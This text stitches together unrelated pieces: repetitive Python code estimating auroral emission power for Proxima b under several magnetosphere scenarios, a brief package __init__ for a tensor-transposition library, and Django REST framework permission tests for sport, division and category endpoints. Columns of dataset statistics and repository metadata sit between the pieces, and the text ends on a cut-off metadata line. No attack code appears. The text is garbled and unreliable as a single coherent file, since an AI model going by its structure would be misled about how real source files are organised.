# 5577 power out for quiet msphere, both hemispheres
out_5577_q = oi_eff*power_out_q*1.e7*e_frac*2*e_5577
print( ' quiet 5577\t-\t%.3e' % out_5577_q + ' w' )
# 5577 power out for stormy msphere, both hemispheres
out_5577_s = oi_eff*power_out_s*1.e7*e_frac*2*e_5577
print( ' substorm 5577\t-\t%.3e' % out_5577_s + ' w' )
# 5577 power out for cme winds, both hemispheres
out_5577_c = oi_eff*power_out_c*1.e7*e_frac*2*e_5577
print( ' cme 5577\t-\t%.3e' % out_5577_c + ' w' )
# 5577 power out for cme winds + stormy msphere, both hemispheres
out_5577_cs = oi_eff*power_out_cs*1.e7*e_frac*2*e_5577
print( ' cme+ss 5577\t-\t%.3e' % out_5577_cs + ' w' )
# -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
# power estimated at
print( '\n-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-' )
print( '\n proxima b - sub-alfvenic,earth-like dipole\n' )
print( '-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\n' )
# magnetopause distance
dist = asig.mpause_dist( nsub, la.norm(vsub), asig.m_earth )
print( ' estimated sub-stellar magnetopause distance: %.3e' % dist + ' m\n' )
# auroral oval
oval = asig.auroral_oval( dist )*1.e4
print( ' estimated auroral oval area: %.3e' % oval + ' cm^2\n' )
# imf clock angle and transverse imf
imf_clock = np.arctan2( abs(bsub[1]), bsub[2] )
b_t = np.sqrt( bsub[1]**2. + bsub[2]**2. )
print( ' estimated auroral energetic particle power delivered to auroral regions:\n' )
# quiet magnetosphere
power_out_q = asig.power_calc( nsub, la.norm(vsub), b_t, imf_clock, asig.m_earth )
print( ' quiet\t\t-\t%.3e' % power_out_q + ' w' )
# stormy magnetosphere
power_out_s = asig.power_calc( nsub, la.norm(vsub), b_t, spcon.pi, asig.m_earth )
print( ' substorm\t-\t%.3e' % power_out_s + ' w' )
# cme wind conditions
power_out_c = asig.power_calc( nsub, la.norm(vsub), b_t, imf_clock, asig.m_earth )*cme_scale
print( ' cme\t\t-\t%.3e' % power_out_c + ' w' )
# cme wind conditions + stormy magnetosphere
power_out_cs = asig.power_calc( nsub, la.norm(vsub), b_t, spcon.pi, asig.m_earth )*cme_scale
print( ' cme+substorm\t-\t%.3e' % power_out_cs + ' w' )
print( '\n estimated auroral power for the oi 5577 a line:\n' )
# 5577 power out for quiet msphere, both hemispheres
out_5577_q = oi_eff*power_out_q*1.e7*e_frac*2*e_5577
print( ' quiet 5577\t-\t%.3e' % out_5577_q + ' w' )
# 5577 power out for stormy msphere, both hemispheres
out_5577_s = oi_eff*power_out_s*1.e7*e_frac*2*e_5577
print( ' substorm 5577\t-\t%.3e' % out_5577_s + ' w' )
# 5577 power out for cme winds, both hemispheres
out_5577_c = oi_eff*power_out_c*1.e7*e_frac*2*e_5577
print( ' cme 5577\t-\t%.3e' % out_5577_c + ' w' )
# 5577 power out for cme winds + stormy msphere, both hemispheres
out_5577_cs = oi_eff*power_out_cs*1.e7*e_frac*2*e_5577
print( ' cme+ss 5577\t-\t%.3e' % out_5577_cs + ' w' )
# -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
# power estimated at
print( '\n-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-' )
print( '\n proxima b - super-alfvenic,earth-like dipole\n' )
print( '-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\n' )
# magnetopause distance
dist = asig.mpause_dist( nsup, la.norm(vsup), asig.m_earth )
print( ' estimated sub-stellar magnetopause distance: %.3e' % dist + ' m\n' )
# auroral oval
oval = asig.auroral_oval( dist )*1.e4
print( ' estimated auroral oval area: %.3e' % oval + ' cm^2\n' )
# imf clock angle and transverse imf
imf_clock = np.arctan2( abs(bsup[1]), bsup[2] )
b_t = np.sqrt( bsup[1]**2. + bsup[2]**2. )
print( ' estimated auroral energetic particle power delivered to auroral regions:\n' )
# quiet magnetosphere
power_out_q = asig.power_calc( nsup, la.norm(vsup), b_t, imf_clock, asig.m_earth )
print( ' quiet\t\t-\t%.3e' % power_out_q + ' w' )
# stormy magnetosphere
power_out_s = asig.power_calc( nsup, la.norm(vsup), b_t, spcon.pi, asig.m_earth )
print( ' substorm\t-\t%.3e' % power_out_s + ' w' )
# cme wind conditions
power_out_c = asig.power_calc( nsup, la.norm(vsup), b_t, imf_clock, asig.m_earth )*cme_scale
print( ' cme\t\t-\t%.3e' % power_out_c + ' w' )
# cme wind conditions + stormy magnetosphere
power_out_cs = asig.power_calc( nsup, la.norm(vsup), b_t, spcon.pi, asig.m_earth )*cme_scale
print( ' cme+substorm\t-\t%.3e' % power_out_cs + ' w' )
print( '\n estimated auroral power for the oi 5577 a line:\n' )
# 5577 power out for quiet msphere, both hemispheres
out_5577_q = oi_eff*power_out_q*1.e7*e_frac*2*e_5577
print( ' quiet 5577\t-\t%.3e' % out_5577_q + ' w' )
# 5577 power out for stormy msphere, both hemispheres
out_5577_s = oi_eff*power_out_s*1.e7*e_frac*2*e_5577
print( ' substorm 5577\t-\t%.3e' % out_5577_s + ' w' )
# 5577 power out for cme winds, both hemispheres
out_5577_c = oi_eff*power_out_c*1.e7*e_frac*2*e_5577
print( ' cme 5577\t-\t%.3e' % out_5577_c + ' w' )
# 5577 power out for cme winds + stormy msphere, both hemispheres
out_5577_cs = oi_eff*power_out_cs*1.e7*e_frac*2*e_5577
print( ' cme+ss 5577\t-\t%.3e' % out_5577_cs + ' w' )
# -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
# power estimated at
print( '\n-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-' )
print( '\n proxima b - sub-alfvenic,neptune-like dipole\n' )
print( '-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\n' )
# magnetopause distance
dist = asig.mpause_dist( nsub, la.norm(vsub), asig.m_neptune )
print( ' estimated sub-stellar magnetopause distance: %.3e' % dist + ' m\n' )
# auroral oval
oval = asig.auroral_oval( dist )*1.e4
print( ' estimated auroral oval area: %.3e' % oval + ' cm^2\n' )
# imf clock angle and transverse imf
imf_clock = np.arctan2( abs(bsub[1]), bsub[2] )
b_t = np.sqrt( bsub[1]**2. + bsub[2]**2. )
print( ' estimated auroral energetic particle power delivered to auroral regions:\n' )
# quiet magnetosphere
power_out_q = asig.power_calc( nsub, la.norm(vsub), b_t, imf_clock, asig.m_neptune )
print( ' quiet\t\t-\t%.3e' % power_out_q + ' w' )
# stormy magnetosphere
power_out_s = asig.power_calc( nsub, la.norm(vsub), b_t, spcon.pi, asig.m_neptune )
print( ' substorm\t-\t%.3e' % power_out_s + ' w' )
# cme wind conditions
power_out_c = asig.power_calc( nsub, la.norm(vsub), b_t, imf_clock, asig.m_neptune )*cme_scale
print( ' cme\t\t-\t%.3e' % power_out_c + ' w' )
# cme wind conditions + stormy magnetosphere
power_out_cs = asig.power_calc( nsub, la.norm(vsub), b_t, spcon.pi, asig.m_neptune )*cme_scale
print( ' cme+substorm\t-\t%.3e' % power_out_cs + ' w' )
print( '\n estimated auroral power for the oi 5577 a line:\n' )
# 5577 power out for quiet msphere, both hemispheres
out_5577_q = oi_eff*power_out_q*1.e7*e_frac*2*e_5577
print( ' quiet 5577\t-\t%.3e' % out_5577_q + ' w' )
# 5577 power out for stormy msphere, both hemispheres
out_5577_s = oi_eff*power_out_s*1.e7*e_frac*2*e_5577
print( ' substorm 5577\t-\t%.3e' % out_5577_s + ' w' )
# 5577 power out for cme winds, both hemispheres
out_5577_c = oi_eff*power_out_c*1.e7*e_frac*2*e_5577
print( ' cme 5577\t-\t%.3e' % out_5577_c + ' w' )
# 5577 power out for cme winds + stormy msphere, both hemispheres
out_5577_cs = oi_eff*power_out_cs*1.e7*e_frac*2*e_5577
print( ' cme+ss 5577\t-\t%.3e' % out_5577_cs + ' w' )
# -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
# power estimated at
print( '\n-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-' )
print( '\n proxima b - super-alfvenic,neptune-like dipole\n' )
print( '-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\n' )
# magnetopause distance
dist = asig.mpause_dist( nsup, la.norm(vsup), asig.m_neptune )
print( ' estimated sub-stellar magnetopause distance: %.3e' % dist + ' m\n' )
# auroral oval
oval = asig.auroral_oval( dist )*1.e4
print( ' estimated auroral oval area: %.3e' % oval + ' cm^2\n' )
# imf clock angle and transverse imf
imf_clock = np.arctan2( abs(bsup[1]), bsup[2] )
b_t = np.sqrt( bsup[1]**2. + bsup[2]**2. )
print( ' estimated auroral energetic particle power delivered to auroral regions:\n' )
# quiet magnetosphere
power_out_q = asig.power_calc( nsup, la.norm(vsup), b_t, imf_clock, asig.m_neptune )
print( ' quiet\t\t-\t%.3e' % power_out_q + ' w' )
# stormy magnetosphere
power_out_s = asig.power_calc( nsup, la.norm(vsup), b_t, spcon.pi, asig.m_neptune )
print( ' substorm\t-\t%.3e' % power_out_s + ' w' )
# cme wind conditions
power_out_c = asig.power_calc( nsup, la.norm(vsup), b_t, imf_clock, asig.m_neptune )*cme_scale
print( ' cme\t\t-\t%.3e' % power_out_c + ' w' )
# cme wind conditions + stormy magnetosphere
power_out_cs = asig.power_calc( nsup, la.norm(vsup), b_t, spcon.pi, asig.m_neptune )*cme_scale
print( ' cme+substorm\t-\t%.3e' % power_out_cs + ' w' )
print( '\n estimated auroral power for the oi 5577 a line:\n' )
# 5577 power out for quiet msphere, both hemispheres
out_5577_q = oi_eff*power_out_q*1.e7*e_frac*2*e_5577
print( ' quiet 5577\t-\t%.3e' % out_5577_q + ' w' )
# 5577 power out for stormy msphere, both hemispheres
out_5577_s = oi_eff*power_out_s*1.e7*e_frac*2*e_5577
print( ' substorm 5577\t-\t%.3e' % out_5577_s + ' w' )
# 5577 power out for cme winds, both hemispheres
out_5577_c = oi_eff*power_out_c*1.e7*e_frac*2*e_5577
print( ' cme 5577\t-\t%.3e' % out_5577_c + ' w' )
# 5577 power out for cme winds + stormy msphere, both hemispheres
out_5577_cs = oi_eff*power_out_cs*1.e7*e_frac*2*e_5577
print( ' cme+ss 5577\t-\t%.3e' % out_5577_cs + ' w' )
# -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
# power estimated at
print( '\n-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-' )
print( '\n proxima b - sub-alf neptune mass, radius and dipole\n' )
print( '-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\n' )
# magnetopause distance
dist = asig.mpause_dist( nsub, la.norm(vsub), asig.m_neptune )
print( ' estimated sub-stellar magnetopause distance: %.3e' % dist + ' m\n' )
# auroral oval
oval = asig.auroral_oval( dist, 3.883*asig.r_earth )*1.e4
print( ' estimated auroral oval area: %.3e' % oval + ' cm^2\n' )
# imf clock angle and transverse imf
imf_clock = np.arctan2( abs(bsub[1]), bsub[2] )
b_t = np.sqrt( bsub[1]**2. + bsub[2]**2. )
print( ' estimated auroral energetic particle power delivered to auroral regions:\n' )
# quiet magnetosphere
power_out_q = asig.power_calc( nsub, la.norm(vsub), b_t, imf_clock, asig.m_neptune )
print( ' quiet\t\t-\t%.3e' % power_out_q + ' w' )
# stormy magnetosphere
power_out_s = asig.power_calc( nsub, la.norm(vsub), b_t, spcon.pi, asig.m_neptune )
print( ' substorm\t-\t%.3e' % power_out_s + ' w' )
# cme wind conditions
power_out_c = asig.power_calc( nsub, la.norm(vsub), b_t, imf_clock, asig.m_neptune )*cme_scale
print( ' cme\t\t-\t%.3e' % power_out_c + ' w' )
# cme wind conditions + stormy magnetosphere
power_out_cs = asig.power_calc( nsub, la.norm(vsub), b_t, spcon.pi, asig.m_neptune )*cme_scale
print( ' cme+substorm\t-\t%.3e' % power_out_cs + ' w' )
print( '\n estimated auroral power for the 967-1115 UV band:\n' )
# 5577 power out for quiet msphere, both hemispheres
out_1041_q = uv_eff*power_out_q*1.e7*e_frac*2*e_1041
print( ' quiet 967-1115\t\t-\t%.3e' % out_1041_q + ' w' )
# 5577 power out for stormy msphere, both hemispheres
out_1041_s = uv_eff*power_out_s*1.e7*e_frac*2*e_1041
print( ' substorm 967-1115\t-\t%.3e' % out_1041_s + ' w' )
# 5577 power out for cme winds, both hemispheres
out_1041_c = uv_eff*power_out_c*1.e7*e_frac*2*e_1041
print( ' cme 967-1115\t\t-\t%.3e' % out_1041_c + ' w' )
# 5577 power out for cme winds + stormy msphere, both hemispheres
out_1041_cs = uv_eff*power_out_cs*1.e7*e_frac*2*e_1041
print( ' cme+ss 967-1115\t-\t%.3e' % out_1041_cs + ' w' )
# -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
# power estimated at
print( '\n-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-' )
print( '\n proxima b - super alf neptune mass, radius and dipole\n' )
print( '-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\n' )
# magnetopause distance
dist = asig.mpause_dist( nsup, la.norm(vsup), asig.m_neptune )
print( ' estimated sub-stellar magnetopause distance: %.3e' % dist + ' m\n' )
# auroral oval
oval = asig.auroral_oval( dist, 3.883*asig.r_earth )*1.e4
print( ' estimated auroral oval area: %.3e' % oval + ' cm^2\n' )
# imf clock angle and transverse imf
imf_clock = np.arctan2( abs(bsup[1]), bsup[2] )
b_t = np.sqrt( bsup[1]**2. + bsup[2]**2. )
print( ' estimated auroral energetic particle power delivered to auroral regions:\n' )
# quiet magnetosphere
power_out_q = asig.power_calc( nsup, la.norm(vsup), b_t, imf_clock, asig.m_neptune )
print( ' quiet\t\t-\t%.3e' % power_out_q + ' w' )
# stormy magnetosphere
power_out_s = asig.power_calc( nsup, la.norm(vsup), b_t, spcon.pi, asig.m_neptune )
print( ' substorm\t-\t%.3e' % power_out_s + ' w' )
# cme wind conditions
power_out_c = asig.power_calc( nsup, la.norm(vsup), b_t, imf_clock, asig.m_neptune )*cme_scale
print( ' cme\t\t-\t%.3e' % power_out_c + ' w' )
# cme wind conditions + stormy magnetosphere
power_out_cs = asig.power_calc( nsup, la.norm(vsup), b_t, spcon.pi, asig.m_neptune )*cme_scale
print( ' cme+substorm\t-\t%.3e' % power_out_cs + ' w' )
print( '\n estimated auroral power for the 967-1115 UV band:\n' )
# 5577 power out for quiet msphere, both hemispheres
out_1041_q = uv_eff*power_out_q*1.e7*e_frac*2*e_1041
print( ' quiet 967-1115\t\t-\t%.3e' % out_1041_q + ' w' )
# 5577 power out for stormy msphere, both hemispheres
out_1041_s = uv_eff*power_out_s*1.e7*e_frac*2*e_1041
print( ' substorm 967-1115\t-\t%.3e' % out_1041_s + ' w' )
# 5577 power out for cme winds, both hemispheres
out_1041_c = uv_eff*power_out_c*1.e7*e_frac*2*e_1041
print( ' cme 967-1115\t\t-\t%.3e' % out_1041_c + ' w' )
# 5577 power out for cme winds + stormy msphere, both hemispheres
out_1041_cs = uv_eff*power_out_cs*1.e7*e_frac*2*e_1041
print( ' cme+ss 967-1115\t-\t%.3e' % out_1041_cs + ' w' )
| 37.640091
| 94
| 0.63786
| 2,743
| 16,524
| 3.655851
| 0.074736
| 0.08935
| 0.022337
| 0.02513
| 0.906861
| 0.906861
| 0.904467
| 0.901276
| 0.901276
| 0.896789
| 0
| 0.068092
| 0.145001
| 16,524
| 438
| 95
| 37.726027
| 0.641704
| 0.250061
| 0
| 0.782609
| 0
| 0
| 0.308836
| 0.071168
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.028986
| 0
| 0.028986
| 0.512077
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 8
|
aece1877cfa8edd8dd29616a9218c01a68b28c8e
| 152
|
py
|
Python
|
pythonAPI/hptt/__init__.py
|
smavros/hptt
|
e0880608cc12b36b0c21bfda72ae8c9d01a23948
|
[
"BSD-3-Clause"
] | 1
|
2018-07-11T17:49:45.000Z
|
2018-07-11T17:49:45.000Z
|
pythonAPI/hptt/__init__.py
|
smavros/hptt
|
e0880608cc12b36b0c21bfda72ae8c9d01a23948
|
[
"BSD-3-Clause"
] | null | null | null |
pythonAPI/hptt/__init__.py
|
smavros/hptt
|
e0880608cc12b36b0c21bfda72ae8c9d01a23948
|
[
"BSD-3-Clause"
] | 1
|
2018-07-11T17:50:24.000Z
|
2018-07-11T17:50:24.000Z
|
#!/usr/bin/env python
"""HPTT - Tensor Transposition Module based on the C++ High-Performance Tensor Transposition library (HPTT)"""
from hptt import *
| 38
| 110
| 0.75
| 21
| 152
| 5.428571
| 0.809524
| 0.333333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.131579
| 152
| 3
| 111
| 50.666667
| 0.863636
| 0.822368
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
aed8e23ef818993c24c8966b26ad4b1b90af3e8c
| 13,724
|
py
|
Python
|
results/tests/test_views_categories.py
|
JukkaKarvonen/sal-kiti
|
3dcff71552ab323e3c97eccf502c0d72eb683967
|
[
"MIT"
] | 1
|
2021-06-12T08:46:32.000Z
|
2021-06-12T08:46:32.000Z
|
results/tests/test_views_categories.py
|
JukkaKarvonen/sal-kiti
|
3dcff71552ab323e3c97eccf502c0d72eb683967
|
[
"MIT"
] | 8
|
2020-07-01T15:06:52.000Z
|
2022-02-20T09:11:23.000Z
|
results/tests/test_views_categories.py
|
JukkaKarvonen/sal-kiti
|
3dcff71552ab323e3c97eccf502c0d72eb683967
|
[
"MIT"
] | 3
|
2020-03-01T17:02:24.000Z
|
2020-07-05T14:37:59.000Z
|
from django.contrib.auth.models import User
from rest_framework import status
from rest_framework.test import APIRequestFactory
from results.models.categories import Category, Division
from results.models.sports import Sport
from results.tests.factories.categories import CategoryFactory, DivisionFactory, SportFactory
from results.tests.utils import ResultsTestCase
from results.views.categories import CategoryViewSet, DivisionViewSet
from results.views.sports import SportViewSet
class SportTestCase(ResultsTestCase):
def setUp(self):
self.factory = APIRequestFactory()
self.user = User.objects.create(username='tester')
self.staff_user = User.objects.create(username="staffuser", is_staff=True)
self.superuser = User.objects.create(username="superuser", is_superuser=True)
self.object = SportFactory.create()
self.data = {'name': self.object.name, 'abbreviation': self.object.abbreviation}
self.newdata = {'name': 'New Sport', 'abbreviation': 'NewS'}
self.url = '/api/sports/'
self.viewset = SportViewSet
self.model = Sport
def test_sport_access_list(self):
request = self.factory.get(self.url)
view = self.viewset.as_view(actions={'get': 'list'})
response = view(request)
self.assertEqual(response.status_code, status.HTTP_200_OK)
def test_sport_access_object_without_user(self):
response = self._test_access(user=None)
self.assertEqual(response.status_code, status.HTTP_200_OK)
for key in self.data:
self.assertEqual(response.data[key], self.data[key])
def test_sport_access_object_with_normal_user(self):
response = self._test_access(user=self.user)
self.assertEqual(response.status_code, status.HTTP_200_OK)
for key in self.data:
self.assertEqual(response.data[key], self.data[key])
def test_sport_update_without_user(self):
response = self._test_update(user=None, data=self.newdata)
self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
def test_sport_update_with_superuser(self):
response = self._test_update(user=self.superuser, data=self.newdata)
self.assertEqual(response.status_code, status.HTTP_200_OK)
def test_sport_update_with_staffruser(self):
response = self._test_update(user=self.staff_user, data=self.newdata)
self.assertEqual(response.status_code, status.HTTP_200_OK)
def test_sport_update_with_normal_user(self):
response = self._test_update(user=self.user, data=self.newdata)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
def test_sport_create_without_user(self):
response = self._test_create(user=None, data=self.newdata)
self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
def test_sport_create_with_superuser(self):
response = self._test_create(user=self.superuser, data=self.newdata)
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
self.assertEqual(self.model.objects.all().count(), 2)
for key in self.newdata:
self.assertEqual(response.data[key], self.newdata[key])
def test_sport_create_existing_with_superuser(self):
response = self._test_create(user=self.superuser, data=self.data)
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
def test_sport_create_with_staffuser(self):
response = self._test_create(user=self.staff_user, data=self.newdata)
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
self.assertEqual(self.model.objects.all().count(), 2)
for key in self.newdata:
self.assertEqual(response.data[key], self.newdata[key])
def test_sport_create_existing_with_staffuser(self):
response = self._test_create(user=self.staff_user, data=self.data)
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
def test_sport_create_with_normal_user(self):
response = self._test_create(user=self.user, data=self.newdata)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
def test_sport_delete_with_user(self):
response = self._test_delete(user=self.user)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
def test_sport_delete_with_superuser(self):
response = self._test_delete(user=self.superuser)
self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)
def test_sport_delete_with_staffuser(self):
response = self._test_delete(user=self.staff_user)
self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)
class DivisionTestCase(ResultsTestCase):
def setUp(self):
self.factory = APIRequestFactory()
self.user = User.objects.create(username='tester')
self.staff_user = User.objects.create(username="staffuser", is_staff=True)
self.superuser = User.objects.create(username="superuser", is_superuser=True)
self.object = DivisionFactory.create()
self.data = {'name': self.object.name, 'abbreviation': self.object.abbreviation}
self.newdata = {'name': 'InnerDiv', 'abbreviation': 'Inner'}
self.url = '/api/divisions/'
self.viewset = DivisionViewSet
self.model = Division
def test_division_access_list(self):
request = self.factory.get(self.url)
view = self.viewset.as_view(actions={'get': 'list'})
response = view(request)
self.assertEqual(response.status_code, status.HTTP_200_OK)
def test_division_access_object_without_user(self):
response = self._test_access(user=None)
self.assertEqual(response.status_code, status.HTTP_200_OK)
for key in self.data:
self.assertEqual(response.data[key], self.data[key])
def test_division_access_object_with_normal_user(self):
response = self._test_access(user=self.user)
self.assertEqual(response.status_code, status.HTTP_200_OK)
for key in self.data:
self.assertEqual(response.data[key], self.data[key])
def test_division_update_without_user(self):
response = self._test_update(user=None, data=self.newdata)
self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
def test_division_update_with_superuser(self):
response = self._test_update(user=self.superuser, data=self.newdata)
self.assertEqual(response.status_code, status.HTTP_200_OK)
def test_division_update_with_staffruser(self):
response = self._test_update(user=self.staff_user, data=self.newdata)
self.assertEqual(response.status_code, status.HTTP_200_OK)
def test_division_update_with_normal_user(self):
response = self._test_update(user=self.user, data=self.newdata)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
def test_division_create_without_user(self):
response = self._test_create(user=None, data=self.newdata)
self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
def test_division_create_with_superuser(self):
response = self._test_create(user=self.superuser, data=self.newdata)
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
self.assertEqual(self.model.objects.all().count(), 2)
for key in self.newdata:
self.assertEqual(response.data[key], self.newdata[key])
def test_division_create_existing_with_superuser(self):
response = self._test_create(user=self.superuser, data=self.data)
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
def test_division_create_with_staffuser(self):
response = self._test_create(user=self.staff_user, data=self.newdata)
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
self.assertEqual(self.model.objects.all().count(), 2)
for key in self.newdata:
self.assertEqual(response.data[key], self.newdata[key])
def test_division_create_existing_with_staffuser(self):
response = self._test_create(user=self.staff_user, data=self.data)
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
def test_division_create_with_normal_user(self):
response = self._test_create(user=self.user, data=self.newdata)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
def test_division_delete_with_user(self):
response = self._test_delete(user=self.user)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
def test_division_delete_with_superuser(self):
response = self._test_delete(user=self.superuser)
self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)
def test_division_delete_with_staffuser(self):
response = self._test_delete(user=self.staff_user)
self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)
class CategoryTestCase(ResultsTestCase):
def setUp(self):
self.factory = APIRequestFactory()
self.user = User.objects.create(username='tester')
self.staff_user = User.objects.create(username="staffuser", is_staff=True)
self.superuser = User.objects.create(username="superuser", is_superuser=True)
self.object = CategoryFactory.create()
self.data = {'name': self.object.name,
'abbreviation': self.object.abbreviation,
'division': self.object.division.pk,
'min_age': self.object.min_age,
'max_age': self.object.max_age,
'gender': self.object.gender,
'historical': self.object.historical}
self.newdata = {'name': 'Core Seniors', 'abbreviation': 'CS', 'division': self.object.division.pk,
'historical': False}
self.url = '/api/categories/'
self.viewset = CategoryViewSet
self.model = Category
def test_category_access_list(self):
request = self.factory.get(self.url)
view = self.viewset.as_view(actions={'get': 'list'})
response = view(request)
self.assertEqual(response.status_code, status.HTTP_200_OK)
def test_category_access_object_without_user(self):
response = self._test_access(user=None)
self.assertEqual(response.status_code, status.HTTP_200_OK)
for key in self.data:
self.assertEqual(response.data[key], self.data[key])
def test_category_access_object_with_normal_user(self):
response = self._test_access(user=self.user)
self.assertEqual(response.status_code, status.HTTP_200_OK)
for key in self.data:
self.assertEqual(response.data[key], self.data[key])
def test_category_update_without_user(self):
response = self._test_update(user=None, data=self.newdata)
self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
def test_category_update_with_superuser(self):
response = self._test_update(user=self.superuser, data=self.newdata)
self.assertEqual(response.status_code, status.HTTP_200_OK)
def test_category_update_with_staffruser(self):
response = self._test_update(user=self.staff_user, data=self.newdata)
self.assertEqual(response.status_code, status.HTTP_200_OK)
def test_category_update_with_normal_user(self):
response = self._test_update(user=self.user, data=self.newdata)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
def test_category_create_without_user(self):
response = self._test_create(user=None, data=self.newdata)
self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
def test_category_create_with_superuser(self):
response = self._test_create(user=self.superuser, data=self.newdata)
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
self.assertEqual(self.model.objects.all().count(), 2)
for key in self.newdata:
self.assertEqual(response.data[key], self.newdata[key])
def test_category_create_existing_with_superuser(self):
response = self._test_create(user=self.superuser, data=self.data)
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
def test_category_create_with_staffuser(self):
response = self._test_create(user=self.staff_user, data=self.newdata)
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
self.assertEqual(self.model.objects.all().count(), 2)
for key in self.newdata:
self.assertEqual(response.data[key], self.newdata[key])
def test_category_create_existing_with_staffuser(self):
response = self._test_create(user=self.staff_user, data=self.data)
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
def test_category_create_with_normal_user(self):
response = self._test_create(user=self.user, data=self.newdata)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
def test_category_delete_with_user(self):
response = self._test_delete(user=self.user)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
def test_category_delete_with_superuser(self):
response = self._test_delete(user=self.superuser)
self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)
def test_category_delete_with_staffuser(self):
response = self._test_delete(user=self.staff_user)
self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)
| 47.652778
| 106
| 0.723477
| 1,749
| 13,724
| 5.402516
| 0.060606
| 0.104773
| 0.146047
| 0.147317
| 0.901365
| 0.893216
| 0.893216
| 0.893216
| 0.893216
| 0.893216
| 0
| 0.013253
| 0.175313
| 13,724
| 287
| 107
| 47.818815
| 0.821612
| 0
| 0
| 0.642241
| 0
| 0
| 0.0239
| 0
| 0
| 0
| 0
| 0
| 0.284483
| 1
| 0.219828
| false
| 0
| 0.038793
| 0
| 0.271552
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
aeefbc13f46b966cb2e7934075fab600c5acd5b1
| 31,332
|
py
|
Python
|
msgraph/cli/command_modules/planner/azext_planner/generated/commands.py
|
microsoftgraph/msgraph-cli-archived
|
489f70bf4ede1ce67b84bfb31e66da3e4db76062
|
[
"MIT"
] | null | null | null |
msgraph/cli/command_modules/planner/azext_planner/generated/commands.py
|
microsoftgraph/msgraph-cli-archived
